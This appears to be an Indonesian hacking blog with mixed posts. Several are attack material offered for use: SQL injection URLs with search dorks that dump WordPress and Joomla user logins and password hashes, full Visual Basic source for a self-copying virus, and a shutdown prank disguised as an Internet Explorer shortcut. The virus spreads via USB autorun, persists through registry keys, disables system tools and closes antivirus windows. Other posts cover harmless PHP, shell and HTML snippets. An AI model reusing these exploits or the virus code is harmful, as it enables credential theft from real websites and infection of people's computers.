KidDevilz

Wordpress Sql Injection

2011-04-05T20:19:00.000-07:00

App : FBConnect WordPress Plugin

Type : Sql-Injection

Dork : inurl:"fbconnect_action=myhome"

Exploit : ?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

PoC : www.site.name/path/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)kiddevilz,7,8,9,10,11,12+from+wp_users--

Membuat Virus MsWord Etc yg baik hati ^__^

2011-01-01T07:56:00.000-08:00

Program kita kali ini adalah membuat Virus sederhana yaitu hanya mengganggu Microsoft Office Word dan Excel.Misalkan user membuka Word maka pada kertas tempat mengetik sudah muncul pesan dari Virus demikian pula jika membuka Excel maka pesan akan diberikan virus pada cell Excel. Sederhana sekali ya..ya memang virus ini tidak merusak dokumen/file-file dan tidak mengahpus file-file apapun jadi virus yang sangat baik hati..he..he..Jika anda ingin menambahkan fiture-fiture yang kejam silahkan saja tapi disini/virus ini tidak saya tuliskan bagaimana melakukan format atau delete file ataupun fiture penyusupan lainnya (sekarang belum saatnya).Silahkan dicoba dijamin 100% tidak ada data yang dihapus, ini hanya sebuah virus permainan saja kok..berani mencoba?
Yang dibutuhkan dalam pembuatan project ini adlah : 5 buah timer dan 1 drivelistbox
Pada proyek kali ini kita dapat belajar mengenai Windows Api Sendmessage, registry, dan Otomatisasi pada Word serta Excel. Semoga bermanfaat.

Masukan semua code di bawah ini pada form :
==========================================

Private Declare Function FindWindow Lib "user32″ Alias "FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long ‘pencari Kleas dan Window Name Suatu File
Private Declare Function SendMessage Lib "user32″ Alias "SendMessageA” (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long ’sendmessage
Private Declare Function GetDriveType& Lib "Kernel32″ Alias "GetDriveTypeA” (ByVal nDrive As String) ‘ penghandel flashdisk
Private Declare Function ExitWindowsEx Lib "user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long ‘exit windows
Private Const WM_CLOSE = &H10
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4
Private Const EWX_POWEROFF = 8

Option Explicit
Dim FWnd
Dim obj As Object
Dim doc As Object
Dim WrkBook As Object
Dim WrkSheet As Object
Dim i As Integer
Dim RegRun
Dim FolderStartUp
Dim FolderMyDocuments
Dim FolderTemplates
Dim FolderNetHood
Dim FolderPrintHood
Dim FolderFavorites
Dim FolderSendTo
Dim FolderPrograms
Dim FlashDisk

Private Sub Form_Load()
On Error Resume Next
‘acak caption virus shg caption akan berubah setiap windows startup atau virus tereksekusi
Randomize
Me.Caption = Int(Rnd * 2221189331445#) ’silahkan masukan angka sesuka anda
‘menggandakan diri
GandakefolderIstimewa
Me.Visible = False
App.TaskVisible = False ‘virus tidak terlihat di task manager
InfeksiRegistry
End Sub

Sub BuatWord()
On Error Resume Next
Set obj = CreateObject(”word.application”)
Set doc = CreateObject(”word.application”)
Set doc = obj.Documents.Add
doc.Content = "VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub BuatXls()
On Error Resume Next
Set obj = CreateObject(”excel.application”)
Set WrkBook = obj.workbooks.Add
Set WrkSheet = WrkBook.worksheets.Add
WrkSheet.Cells(15, 4) = "VIRUS BERHASIL MENGINFEKSIMU – SALAM KENAL”
End Sub

Sub InfeksiRegistry()
On Error Resume Next
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell”, "Explorer.exe” & ” "”" & FolderMyDocuments & "\services.exe”"” ‘virus akan tetap berjalan pada tipe windows Safe Mode
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\AlternateShell”, FolderFavorites & "\SalamKenal.exe” ‘virus akan tetap berjalan pada tipe windows Safe Mode With Command Prompt
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, "REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, "REG_DWORD” ‘Folder Options tdk dapat diakses
RegRun.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, "REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden”, 0, "REG_DWORD” ‘Sembunyikan file beratribut superhidden/File-file system
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, "REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System\DisableCMD”, 1, "REG_DWORD” ‘Disable CMD dan File .Bat
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, "REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools”, 1, "REG_DWORD” ‘registry tdk dapat diakses dan tdk dapat melakukan pengimporan file berekstensi Reg
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderTemplates & "\smss.exe” ’smss.exe berjalan pada saat startup
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Winlogon”, FolderSendTo & "\System.exe” ‘System.exe berjalan pada saat startup
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, "REG_DWORD” ’search pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFind”, 1, "REG_DWORD” ‘Ssearch pd star menu hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, "REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoSMHelp”, 1, "REG_DWORD” ‘help suport pd star menu hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, "REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoClose”, 1, "REG_DWORD” ‘Tombol Turn Off pd star menu hilang
RegRun.regwrite "HKEY_CURRENT_USER\Control Panel\Colors\WindowText”, "255 0 0″, "REG_SZ” ‘DEFAULT TEKS MENJADI MERAH
RegRun.regwrite "HKEY_CLASSES_ROOT\Drive\shell\Scan With Antivirus\Command\”, FolderFavorites & "\SalamKenal.exe” ‘Membuat Menu Scan With Antivirus pada klik kanan Drive-drive, tapi bukan Antivirus yang dijalankan melainkan Virus SalamKenal.exe yang terletak di Folder Favorite
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, "REG_DWORD” ‘Drive C hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrives”, 4, "REG_DWORD” ‘Drive C hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, "REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\InternetExplorer\policies\Explorer\NoFileMenu”, 1, "REG_DWORD” ‘Menu File pada Windows Ekplorer hilang
RegRun.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\Autorun”, 1, "REG_DWORD” ‘Autorun pada CD atau USB
End Sub

Sub GandaKeFlashDisk()
On Error Resume Next
If Dir(FlashDisk & "\Winlogon.exe”) <> "Winlogon.exe” Then ‘mengecek ada atau tdknya winlogon.exe di flashdisk jika tdk ada kemudian
FileCopy FolderStartUp & "\Winlogon.exe”, FlashDisk & "\Winlogon.exe”
SetAttr FlashDisk & "\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
End If
BuatFileAutorunInf
End Sub

Sub BuatFileAutorunInf()
‘membuat file Autorun.inf ke flashdisk yang berfungsi agar setiap flashdisk jika di klik dua kali/klik kanan trus klik open maka Virus (winlogon.exe) akan tereksekusi
On Error Resume Next
Open FlashDisk & "\Autorun.Inf” For Output As 1
Print #1, "[AutoRun]”
Print #1, "Icon=Winlogon.exe” ‘Agar FlashDisk Memiliki Icon Sama dengan Virus
Print #1, "Open=Winlogon.exe”
Print #1, "ShellExecute=Winlogon.exe”
Print #1, "Shell\Open\Command=Winlogon.exe”
Print #1, "Shell=Open”
Close #1
SetAttr FlashDisk & "\Autorun.Inf”, vbHidden + vbSystem + vbReadOnly
End Sub

Sub GandakefolderIstimewa()
On Error Resume Next
Set RegRun = CreateObject(”WScript.Shell”)
FolderStartUp = RegRun.specialfolders(”StartUp”)
FolderMyDocuments = RegRun.specialfolders(”MyDocuments”)
FolderTemplates = RegRun.specialfolders(”Templates”)
FolderNetHood = RegRun.specialfolders(”NetHood”)
FolderPrintHood = RegRun.specialfolders(”PrintHood”)
FolderFavorites = RegRun.specialfolders(”Favorites”)
FolderSendTo = RegRun.specialfolders(”SendTo”)
FolderPrograms = RegRun.specialfolders(”Programs”)
On Error Resume Next
‘membuat virus dengan nama winlogon.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderStartUp & "\WinLogon.Exe”
SetAttr FolderStartUp & "\Winlogon.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama services.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderMyDocuments & "\services.Exe”
SetAttr FolderMyDocuments & "\services.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama smss.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderTemplates & "\smss.Exe”
SetAttr FolderTemplates & "\smss.Exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama csrss.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderPrintHood & "\csrss.Exe”
SetAttr FolderPrintHood & "\csrss.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama Isass.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderNetHood & "\Isass.Exe”
SetAttr FolderNetHood & "\Isass.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama SalamKenal.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderFavorites & "\SalamKenal.Exe”
SetAttr FolderFavorites & "\SalamKenal.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama System.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderSendTo & "\System.Exe”
SetAttr FolderSendTo & "\System.exe”, vbHidden + vbSystem + vbReadOnly
‘membuat virus dengan nama ctfmon.exe
FileCopy App.Path & "\” & App.EXEName & ".exe”, FolderPrograms & "\ctfmon.Exe”
SetAttr FolderPrograms & "\ctfmon.exe”, vbHidden + vbSystem + vbReadOnly
End Sub

Private Sub Timer1_Timer() ‘Timer 1 diberi interval 5 detik
On Error Resume Next
FWnd = FindWindow(”OpusApp”, "Document1 – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(”OpusApp”, "New Microsoft Word Document.doc – Microsoft Word”) ‘Ms Word
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatWord
obj.Visible = True
Timer2.Enabled = True
Timer1.Enabled = False
End If
End Sub

Private Sub Timer2_Timer()
On Error Resume Next
FWnd = FindWindow(”XLMAIN”, "Microsoft Excel – Book1″) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
On Error Resume Next
FWnd = FindWindow(”XLMAIN”, "Microsoft Excel – New Microsoft Excel Worksheet.xls”) ‘ms excel
If FWnd <> 0 Then
SendMessage FWnd, WM_CLOSE, True, True
BuatXls
obj.Visible = True
Timer1.Enabled = True
Timer2.Enabled = False
End If
End Sub

Private Sub Timer3_Timer()
On Error Resume Next
‘menutup aplikasi yang berbahaya bagi virus
FWnd = FindWindow(”#32770″, "RUN”) ‘jendela run
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, "System Configuration Utility”) ‘msconfig
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, "Windows Task Manager”) ‘task manager
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, "Avira AntiVir Personal – Free Antivirus”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”#32770″, "AntiVir Guard: Attention, Detection!”) ‘Avira Antivir
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”RegEdit_RegEdit”, vbNullString) ‘regedit.exe
SendMessage FWnd, WM_CLOSE, 0&, 0&
FWnd = FindWindow(”TMainForm”, vbNullString) ‘aplikasi buatan Delphi (Antivirus PCMAV yang versi lama dapat ditutup tetapi versi yang baru tidak bisa dihentikan) <:d SendMessage FWnd, WM_CLOSE, 0&, 0& FWnd = FindWindow(”TApplication”, vbNullString) ‘aplikasi buatan Delphi SendMessage FWnd, WM_CLOSE, 0&, 0& End Sub

Private Sub Timer4_Timer()
‘cari flashdisk
On Error Resume Next
For i = 0 To Drive1.ListCount – 1
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> "a” Then
FlashDisk = (Drive1.List(i))
Timer4.Enabled = False ‘agar lampu flashdisk tdk berkedip-kedip terlalu lama, sehingga tdk mencurigakan si empunya flashdisk
Exit For
End If
Next
GandaKeFlashDisk ‘
End Sub

Private Sub Timer5_Timer()
On Error Resume Next
InfeksiRegistry
‘Mungkin salah satu virus dihapus shg perlu selalu menggandakan diri
GandakefolderIstimewa
‘menyalakan timer 4
If GetDriveType(Drive1.List(i)) = 2 And Left(Drive1.List(i), 1) <> "a” Then
Timer4.Enabled = True
End If
End Sub

Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
Cancel = 1
End Sub

Private Sub Form_Unload(Cancel As Integer)
Cancel = 1
End Sub

silahkan download projectnya

moga bermanfaat... ^__^

Mematikan Komputer dengan Bom waktu

2011-01-01T06:17:00.000-08:00

Trik ini W peroleh ketika jalan2 d Taman Google truss mmpir di YouTube dan trik ini juga bisa kita pakai untuk menjahili komputer teman kita. kalau belum tahu triknya maka trik ini pasti akan dianggap virus, karena apa?, trik ini akan mengeluarkan sebuah pop up window kecil yang memberitahukan bahwasanya windows akan dimatikan dalam beberapa detik, layaknya bom waktu yang difilm itu loch. Dan pop up ini tidak bisa dihilangkan, baik dengan jalan task manager atau apapun kecuali kita punya kuncinya.

Berikut ini langkah-langkahnya :

Klik kanan pada desktop, kemudian pilih new shortcut, kemudian akan muncul window kecil, kemudian masukan ke teks box = shutdown -s -t 800 -c "Pesan anda”

Kemudian klik next, maka anda akan diminta membuat untuk icon anda, anda bebas memberi nama apapun, kali ini W dengan contoh "Internet Explorer”, kemudian klik finish.

Jadi dech, tapi kok icon nya jelek ya?, untuk itu klik kanan pada icon tersebut, kemudian klik property, klik change icon, klik OK aja kalau ada konfirmasi, kemudian pilih icon sesuai selera (disini W dengan contoh icon Internet Explorer).OK, apply, OK.

Kemudian mari kita coba double klik icon tersebut, maka kalau benar maka akan keluar sebuah konfirmasi bahwa windows akan shutdown dalam waktu beberapa menit. nah kalau dibiarkan terus maka akan benar-benar shutdown.

nah untuk menanggulanginya, cukup klik start, pilih RUN, lalu ketikan shutdown -a

ni brjalan cuman d Windows ja, lw d linux blom tw... hihihiihi

selamat mencoba, moga bermanfaat... ^__^

phpBB Exploits

2010-12-29T22:37:00.000-08:00

Bagi temen2 yg pingin nonton video exploits phpBB, silahkan download di bawah ini :

Download

FirePHP

2010-09-13T02:31:00.000-07:00

FirePHP memungkinkan kita untuk login ke Firebug Console menggunakan simple PHP methode untuk memanggil

Semua data dikirim melalui serangkaian respon header X-FirePHP-Data. Ini berarti bahwa data debug tidak akan mengganggu. Jadi FirePHP cocok untuk pengembangan AJAX dimana JSON atau XML memerlukan respon yang bersih.

<?php

require('FirePHPCore/fb.php')

/* NOTE: You must have Output Buffering enabled via
ob_start() or output_buffering ini directive. */

fb('Hello World'); /* Defaults to FirePHP::LOG */

fb('Log message' ,FirePHP::LOG);
fb('Info message' ,FirePHP::INFO);
fb('Warn message' ,FirePHP::WARN);
fb('Error message',FirePHP::ERROR);

fb('Message with label','Label',FirePHP::LOG);

fb(array('key1'=>'val1',
'key2'=>array(array('v1','v2'),'v3')),
'TestArray',FirePHP::LOG);

function test($Arg1) {
throw new Exception('Test Exception');
}
try {
test(array('Hello'=>'World'));
} catch(Exception $e) {
/* Log exception including stack trace & variables */
fb($e);
}

fb(array('2 SQL queries took 0.06 seconds',array(
array('SQL Statement','Time','Result'),
array('SELECT * FROM Foo','0.02',array('row1','row2')),
array('SELECT * FROM Bar','0.04',array('row1','row2'))
)),FirePHP::TABLE);

?>

Sumber

Shell Script Untuk Mendapatkan Informasi data center, IP pemilik, Kota dan Negara Dari Nama Domain

2010-08-31T06:00:00.000-07:00

#!/bin/bash
# A sample shell script to print domain ip address hosting information such as
# Location of server, city, ip address owner, country and network range.
# This is useful to track spammers or research purpose.
# -------------------------------------------------------------------------
# Copyright (c) 2006 nixCraft project <http://cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# -------------------------------------------------------------------------
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# -------------------------------------------------------------------------
# Last updated on Mar/05/2010
# -------------------------------------------------------------------------

# Get all domains
_dom=$@

# Die if no domains are given
[ $# -eq 0 ] && { echo "Usage: $0 domain1.com domain2.com ..."; exit 1; }
for d in $_dom
do
_ip=$(host $d | grep 'has add' | head -1 | awk '{ print $4}')
[ "$_ip" == "" ] && { echo "Error: $d is not valid domain or dns error."; continue; }
echo "Getting information for domain: $d [ $_ip ]..."
whois "$_ip" | egrep -w 'OrgName:|City:|Country:|OriginAS:|NetRange:'
echo ""

done

Jalankan script berikut ini :

./script.sh cyberciti.biz google.com

Contoh yang keluar:

Getting information for domain: cyberciti.biz [ 74.86.48.99 ]...
OrgName:    SoftLayer Technologies Inc.
City:       Dallas
Country:    US
NetRange:   74.86.0.0 - 74.86.255.255
OriginAS:   AS36351

Getting information for domain: google.com [ 209.85.231.104 ]...
OrgName:    Google Inc.
City:       Mountain View
Country:    US
NetRange:   209.85.128.0 - 209.85.255.255

Sumber

Bingung, apa ni ya Maksudnya??

2010-08-10T12:20:00.000-07:00

Aku kan sekarang gi sekolah d luar negeri (LEBAY,... ^_^ ^_^), truss aku tanya d tempat diskusi kayak gni :

password generated with Wordpress
technology?
how to decrypt?
for example:
admin:$P$9UNhia0YtfZBjpIxbzHZMsuL.SXrU9.

habis tu ada yang jawab kayak gni :

Need the salt and it its word press look at the source for the hashing to get an idea of what other information you need...but really u need the salt to crack them, unless they changed out they generate the hash of a password. Otherwise you can crack the salt as well and make it a bitch lol.

Someone correct me or confirm this please.

<?php
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;

function PasswordHash($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;

$this->portable_hashes = $portable_hashes;

$this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compability reasons
}

function get_random_bytes($count)
{
$output = '';
if ( @is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}

if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}

return $output;
}

function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);

return $output;
}

function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);

return $output;
}

function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';

if (substr($setting, 0, 3) != '$P$')
return $output;

$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;

$count = 1 << $count_log2;

$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;

if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}

$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);

return $output;
}

function gensalt_extended($input)
{
$count_log2 = min($this->iteration_count_log2 + 8, 24);
# This should be odd to not reveal weak DES keys, and the
# maximum valid value is (2**24 - 1) which is odd anyway.
$count = (1 << $count_log2) - 1;

$output = '_';
$output .= $this->itoa64[$count & 0x3f];
$output .= $this->itoa64[($count >> 6) & 0x3f];
$output .= $this->itoa64[($count >> 12) & 0x3f];
$output .= $this->itoa64[($count >> 18) & 0x3f];

$output .= $this->encode64($input, 3);

return $output;
}

function gensalt_blowfish($input)
{
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;

$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);

return $output;
}

function HashPassword($password)
{
$random = '';

if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}

if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) {
if (strlen($random) < 3)
$random = $this->get_random_bytes(3);
$hash =
crypt($password, $this->gensalt_extended($random));
if (strlen($hash) == 20)
return $hash;
}

if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;

return '*';
}

function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);

return $hash == $stored_hash;
}
}

?>

^code used to generate the hash, may not be the same as your version but ya...

<?php
$wp_hasher = new PasswordHash(8, TRUE);

$password_hashed = '$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/';
$plain_password = 'test';

if($wp_hasher->CheckPassword($plain_password, $password_hashed)) {
echo "YES, Matched";
}
else {
echo "No, Wrong Password";
}
?>

^code from wordpress that can be modified to brute a password, just a fyi lol

That should be everything you need :D

habis itu aku bingung banget apa tu maksud dari jawaban orang tu ya,,....
soalnya bahasa inggris minim banget, jdi ya agak bingung,,,,...

Anti Trojan Elite

2010-08-10T11:44:00.000-07:00

Anti Trojan Elite adalah malware remover yang akan mendeteksi dan membersihkan malware pada disk atau memori.
Anti Trojan Elite dapat mendeteksi lebih dari 35.000 trojan, worm dan keyloggers.

Anti Trojan Elite memiliki beberapa Utility:

The network utility [AD] : Dapat digunakan untuk memutuskan koneksi TCP yang mencurigakan.
The process utility : Dapat digunakan untuk membunuh proses yang mencurigakan bahkan proses memiliki sistem priviage, bahkan memiliki kemampuan untuk membongkar modul mencurigakan dalam semua proses.
The registry repair utility : Dapat digunakan untuk memperbaiki registri diubah oleh malware.
The registry monitor utility : Dapat digunakan untuk memperbaiki perubahan dari kunci registri penting dan nilai-nilai dengan real time.

Download :
Anti Trojan Elite

Download :
Trojan Remover

Html Trojan

2010-08-10T11:09:00.000-07:00

Sqlmap 0.5 - Automated SQL Injection Tool

2010-08-10T10:48:00.000-07:00

==[Features]==

* Full support for MySQL, Oracle, PostgreSQL and Microsoft SQL Server database management system back-end.

* Can also identify Microsoft Access, DB2, Informix and Sybase;

* Extensive database management system back-end fingerprint based upon:
- Inband DBMS error messages
- DBMS banner parsing
- DBMS functions output comparison
- DBMS specific features such as MySQL comment injection
- Passive SQL injection fuzzing

* It fully supports two SQL injection techniques:
- Blind SQL injection, also known as Inference SQL injection
- Inband SQL injection, also known as UNION query SQL injection

Download : sqlmap 0.5

Joomla Component (com_youtube) SQL Injection Vulnerability

2010-08-10T10:21:00.000-07:00

==[Google Dork]==

inurl:"com_youtube"

##################################################

===[ Exploit ]===

http://www.site.com/index.php?option=com_youtube&id_cate=4

union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

or

http://www.site.com/index.php?option=com_youtube&id_cate=55
union+select+1,concat(username,0x3a,email),3,4,5,6,7,8+from+jos_users--

##################################################

Joomla Component SQL Injection Vulnerability

2010-08-09T08:03:00.000-07:00

[Google Dork]:

inurl:com_content

Exploit :

http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL}

http://localhost/index.php?option=com_content&task=blogcategory&id=60 Itemid=99999+union+select+1,concat_ws(0x3a,username,password),3,4,5+from+jos_users/*

Remove Element from array

2010-08-01T01:10:00.000-07:00

Bagi yang udah ngerti atau udah merasa master skip ja bacaan yang tidak berguna ini, soalnya ini hanya hasil Copas ja....

Kode ini menghapus elemen dari sebuah array, kita bisa memasukkan salah satu kunci atau nilai dari elemen yang ingin kita hapus :


<?
$arr[]="abdy";
$arr[]='andy';
$arr[]='elis';
$arr[]='budiono';
$arr[]='Isa';

unset_arr($arr,"key","9");
function unset_arr($arr, $searchField="value",$value)
{
echo "Array 1:= ";print_r($arr);
if($searchField=="key")
{
if(array_key_exists($value,$arr))
{
echo "Key= $key is unset....!";
}
else
echo "Key=$value is not exist in array<br />";
}
else
{
$found=array_search($value,$arr);
if($found!="") unset($arr[$found]);
else
echo "Given value is not exist in array.....!<br />";
}
echo "<br />";
$arr=array_values($arr);
echo "Array Result==";
print_r($arr);
return $arr;
}
?>

Moga bermanfaat,,, :) :)

PYTHON HYPERSCHEMA 3.0

2010-07-12T06:37:00.000-07:00

Hyperschema Python merupakan proyek domain open source publik, dan sangat bagus untuk HTML hypermaps dari skema database SQL, terdiri dari dua PL kecil / file SQL dan satu Python (atau C) file source code. Halaman HTML yang dihasilkan memiliki data mousover menampilkan untuk semua kunci, serta daftar hyperlink dari semua kata kunci menunju ke semua tujuan masing-masing dan indeks utama semua tabel.

Sekarang Versi 3.0 sudah keluar, di samping terjemahan dari C Python ini perbaikan minor bug yang di rilis versi 2,1.

Petunjuk ada di file README disertakan dengan zip dan Tgz.

Sumber : Hyperschema

Background color Link

2010-07-09T08:42:00.000-07:00

Pagi yang udh ngerti atau udh master jangan d ketawain ya postingan saya ni,, soalnya saya masih blajar... ^_^ ^_^

Codescript ini secara dinamis mengubah warna background link di halaman situs. Kontrol warna menggunakan onMouseOver, onMouseOut, onClick, dan kombinasi dari semua itu.

Letakkan kode di antara <body> dan </ body> di halaman HTML dimana kita ingin link muncul. Edit teks link yg diberikan untk titik di halaman yang ingin kita buka.

Langkah 1 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna mouse tempat link.

<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>

Langkah 2 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna menghilangkan mouse dari atas link (onMouseOut).

<a href="link.htm" onMouseOut="document.bgColor='#00ff00'">Link Text</a>

